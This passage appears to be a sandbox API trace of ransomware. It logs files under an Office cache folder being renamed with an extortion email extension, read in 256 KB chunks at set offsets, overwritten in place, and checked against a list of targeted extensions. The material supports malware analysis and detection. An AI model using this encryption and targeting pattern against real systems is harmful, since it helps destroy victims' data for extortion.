users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0035.682] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.682] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.682] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.682] ReadFile (in: hFile=0x1b0, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.690] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.690] ReadFile (in: hFile=0x1b0, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.701] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.701] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.701] ReadFile (in: hFile=0x1b0, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.871] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.872] WriteFile (in: hFile=0x1b0, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc010e, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc010e, lpOverlapped=0x0) returned 1 [0036.164] SetEndOfFile (hFile=0x1b0) returned 1 [0036.164] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0036.167] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.168] WriteFile (in: hFile=0x1b0, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.169] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.169] WriteFile (in: hFile=0x1b0, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.175] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.175] WriteFile (in: hFile=0x1b0, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.178] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0036.178] CloseHandle (hObject=0x1b0) returned 1 [0037.317] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.317] lstrlenW (lpString=".doc") returned 4 [0037.317] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.317] lstrlenW (lpString=".docx") returned 5 [0037.317] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.317] lstrlenW (lpString=".pdf") returned 4 [0037.317] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.317] lstrlenW (lpString=".xls") returned 4 [0037.317] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.317] lstrlenW (lpString=".xlsx") returned 5 [0037.318] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.318] lstrlenW (lpString=".ppt") returned 4 [0037.318] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.318] lstrlenW (lpString=".zip") returned 4 [0037.318] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.318] lstrlenW (lpString=".rar") returned 4 [0037.318] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.318] lstrlenW (lpString=".bz2") returned 4 [0037.318] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.318] lstrlenW (lpString=".7z") returned 3 [0037.318] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.318] lstrlenW (lpString=".dbf") returned 4 [0037.318] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.318] lstrlenW (lpString=".1cd") returned 4 [0037.318] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.318] lstrlenW (lpString=".jpg") returned 4 [0037.318] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.318] lstrlenW (lpString=".doc") returned 4 [0037.318] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.318] lstrlenW (lpString=".docx") returned 5 [0037.318] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.318] lstrlenW (lpString=".pdf") returned 4 [0037.318] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.318] lstrlenW (lpString=".xls") returned 4 [0037.318] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.318] lstrlenW (lpString=".xlsx") returned 5 [0037.318] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.318] lstrlenW (lpString=".ppt") returned 4 [0037.319] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.319] lstrlenW (lpString=".zip") returned 4 [0037.319] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.319] lstrlenW (lpString=".rar") returned 4 [0037.319] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.319] lstrlenW (lpString=".bz2") returned 4 [0037.319] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.319] lstrlenW (lpString=".7z") returned 3 [0037.319] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.319] lstrlenW (lpString=".dbf") returned 4 [0037.319] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.319] lstrlenW (lpString=".1cd") returned 4 [0037.319] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.319] lstrlenW (lpString=".jpg") returned 4 [0037.319] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.319] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0037.319] lstrlenW (lpString="PubLR.cab") returned 9 [0037.319] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0037.319] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=9958388) returned 1 [0037.319] CloseHandle (hObject=0x1fc) returned 1 [0037.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020 [0037.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.320] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0037.320] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0037.320] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0037.320] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.320] ReadFile (in: hFile=0x1fc, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.368] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.368] ReadFile (in: hFile=0x1fc, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.375] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.375] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.375] ReadFile (in: hFile=0x1fc, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.393] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.393] WriteFile (in: hFile=0x1fc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0037.612] SetEndOfFile (hFile=0x1fc) returned 1 [0037.612] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42cc930 [0037.616] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.616] WriteFile (in: hFile=0x1fc, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.617] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.617] WriteFile (in: hFile=0x1fc, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.621] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.621] WriteFile (in: hFile=0x1fc, lpBuffer=0x42cc930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42cc930*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.626] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42cc930 | out: hHeap=0xb10000) returned 1 [0037.626] CloseHandle (hObject=0x1fc) returned 1 [0040.418] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0040.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.418] lstrlenW (lpString=".doc") returned 4 [0040.418] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.418] lstrlenW (lpString=".docx") returned 5 [0040.418] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.418] lstrlenW (lpString=".pdf") returned 4 [0040.419] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString=".xls") returned 4 [0040.419] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString=".xlsx") returned 5 [0040.419] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.419] lstrlenW (lpString=".ppt") returned 4 [0040.419] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.419] lstrlenW (lpString=".zip") returned 4 [0040.419] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString=".rar") returned 4 [0040.419] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString=".bz2") returned 4 [0040.419] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.419] lstrlenW (lpString=".7z") returned 3 [0040.419] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.419] lstrlenW (lpString=".dbf") returned 4 [0040.419] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.419] lstrlenW (lpString=".1cd") returned 4 [0040.419] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.419] lstrlenW (lpString=".jpg") returned 4 [0040.419] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.419] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.419] lstrlenW (lpString=".doc") returned 4 [0040.419] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString=".docx") returned 5 [0040.419] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0040.419] lstrlenW (lpString=".pdf") returned 4 [0040.419] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.419] lstrlenW (lpString=".xls") returned 4 [0040.420] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.420] lstrlenW (lpString=".xlsx") returned 5 [0040.420] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0040.420] lstrlenW (lpString=".ppt") returned 4 [0040.420] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.420] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.420] lstrlenW (lpString=".zip") returned 4 [0040.420] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.420] lstrlenW (lpString=".rar") returned 4 [0040.420] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.420] lstrlenW (lpString=".bz2") returned 4 [0040.420] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.420] lstrlenW (lpString=".7z") returned 3 [0040.420] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.420] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.420] lstrlenW (lpString=".dbf") returned 4 [0040.420] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.420] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.420] lstrlenW (lpString=".1cd") returned 4 [0040.420] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.420] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0040.420] lstrlenW (lpString=".jpg") returned 4 [0040.420] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.420] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0040.420] lstrlenW (lpString="Proof.cab") returned 9 [0040.420] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.421] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=11482605) returned 1 [0040.421] CloseHandle (hObject=0x1fc) returned 1 [0040.421] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab")) returned 0x2020 [0040.421] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.421] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0040.813] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0040.813] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0040.813] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.813] ReadFile (in: hFile=0x1fc, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.944] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.944] ReadFile (in: hFile=0x1fc, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.948] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0040.948] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.948] ReadFile (in: hFile=0x1fc, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.032] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.032] WriteFile (in: hFile=0x1fc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0041.207] SetEndOfFile (hFile=0x1fc) returned 1 [0041.207] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0041.207] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.207] WriteFile (in: hFile=0x1fc, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.208] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.208] WriteFile (in: hFile=0x1fc, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.210] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.210] WriteFile (in: hFile=0x1fc, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.212] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0041.212] CloseHandle (hObject=0x1fc) returned 1 [0044.372] SetFileAttributesW (lpFileName="C:\\MSOCache\\All 